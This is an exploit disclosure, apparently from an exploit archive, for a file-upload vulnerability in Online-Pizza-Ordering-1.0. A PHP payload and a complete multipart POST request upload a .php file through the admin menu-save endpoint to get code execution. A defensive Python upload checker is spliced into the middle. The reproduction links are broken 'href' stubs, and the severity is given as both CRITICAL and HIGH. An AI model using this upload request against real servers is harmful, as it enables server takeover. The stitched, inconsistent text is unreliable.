Online-Pizza-Ordering-1.0

Vendor

Description:

A malicious user can request an account from the administrator of this system and then use this vulnerability to destroy or gain access to all accounts on the system, or worse. The malicious user can upload a very dangerous file to this server and execute it via a shell. The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:

<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ; 
  
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ; 
  
// using rename() function to rename the file
rename( $old_name, $new_name) ;
  
?>

[+]Injection_REQUEST:

POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1
Host: pwnedhost7.com
Content-Length: 1050
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX
Origin: http://pwnedhost7.com
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="name"


------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="description"


------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="status"

on
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="category_id"

4
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="price"


------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="img"; filename="namebasterd.php"
Content-Type: application/octet-stream

<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ; 
  
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ; 
  
// using rename() function to rename the file
rename( $old_name, $new_name) ;
  
?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--
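A defender-side check for the request above, added here as an example and not part of the original repository: it parses a multipart body and flags file parts whose name or content indicates server-side PHP, as the `img` part does. The function name, the extension deny set and the sample body (a placeholder payload under the page's boundary and field names) are assumptions.

```python
import re
from email import message_from_bytes
from email.policy import HTTP

# Assumed deny set of extensions a PHP-enabled server may execute.
EXEC_EXT = {"php", "php5", "phtml", "phar", "pht"}
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)

def inspect_upload(content_type: str, body: bytes) -> list:
    """Return one finding per multipart file part that looks like server-side code."""
    # Re-attach the Content-Type header so the stdlib MIME parser can split the parts.
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    findings = []
    for part in message_from_bytes(raw, policy=HTTP).iter_parts():
        filename = part.get_filename()
        if not filename:
            continue  # ordinary form field such as "name" or "price"
        reasons = []
        # Check every dotted segment, so "x.php.jpg" is caught as well.
        if EXEC_EXT & set(filename.lower().split(".")[1:]):
            reasons.append("executable extension")
        if PHP_TAG.search(part.get_payload(decode=True) or b""):
            reasons.append("PHP open tag in content")
        if reasons:
            findings.append({
                "field": part.get_param("name", header="content-disposition"),
                "filename": filename,
                "reasons": reasons,
            })
    return findings

# Constructed sample: the boundary, field names and file name follow the request
# above; the file content is a harmless placeholder.
BOUNDARY = "----WebKitFormBoundaryt8ceBsdqMkRKDoHX"
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="category_id"',
    "", "4",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="img"; filename="namebasterd.php"',
    "Content-Type: application/octet-stream",
    "", "<?php /* placeholder */ ?>",
    "--" + BOUNDARY + "--", "",
]).encode("ascii")

if __name__ == "__main__":
    for finding in inspect_upload(SAMPLE_CONTENT_TYPE, SAMPLE_BODY):
        print(finding)
```

A check like this belongs in front of the upload handler as a detection signal; the handler itself still has to enforce an allow-list of image types and choose the stored file name server-side.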

Reproduce:

href

Proof and Exploit:

href

Time spent:

00:45:00